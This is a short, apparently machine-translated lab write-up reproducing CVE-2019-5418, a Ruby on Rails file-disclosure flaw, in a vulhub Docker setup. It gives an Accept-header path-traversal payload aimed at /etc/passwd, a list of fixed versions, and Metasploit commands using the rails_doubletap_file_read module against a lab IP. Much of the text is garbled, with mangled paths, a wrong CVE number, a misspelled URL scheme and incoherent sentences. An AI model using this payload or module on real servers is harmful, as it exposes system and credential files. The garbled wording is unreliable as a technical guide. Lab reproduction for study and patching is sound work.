CVE-2019-5418 vulnerability reproducibility
0x00 introduce vulnerabilities
Ruby on Rails is a web application framework, the web is a relatively new application framework
built on Ruby language
0x01 vulnerability principle
In view of the controller for rendering by render file other than an application form, and the specific location will be determined according to the user file Accept incoming head.
By passing Accept: ... / ... / ... / ... / ... / ... / ... / ... / etc / passwd {{ constitute any file up through the constructed path vulnerability, read.
({{Template closed path)
0x02 Affects Version
Rails Full versions
which fix release
6.0.0.beta3,
5.2.2.1
5.1.6.2
5.0.7.2
4.2.11.1
0x03 vulnerability repair
https://github.com/rails/rails/commit/f4c70c2222180b8d9d924f00af0c7fd632e26715
0x04 environmental vulnerability
[cd / vulhub / Rails / CVE-9-5418]
[Docker Compose-Build]
[Docker Compose-up -d] ---- proposed replacement of domestic security source -
[Docker PS]
[htttp: //192.168.139.137 : 3000]
Vulnerability 0x05 reproduction
method: using change packets and capture burp
方法二:metapo
[msfconsole]
[search rails]
[use auxiliary/gather/rails_doubletap_file_read]
[options]
[set rhost 192.168.139.137 ]
[set rport 3000]
[set route robots]
[exploit]—存在漏洞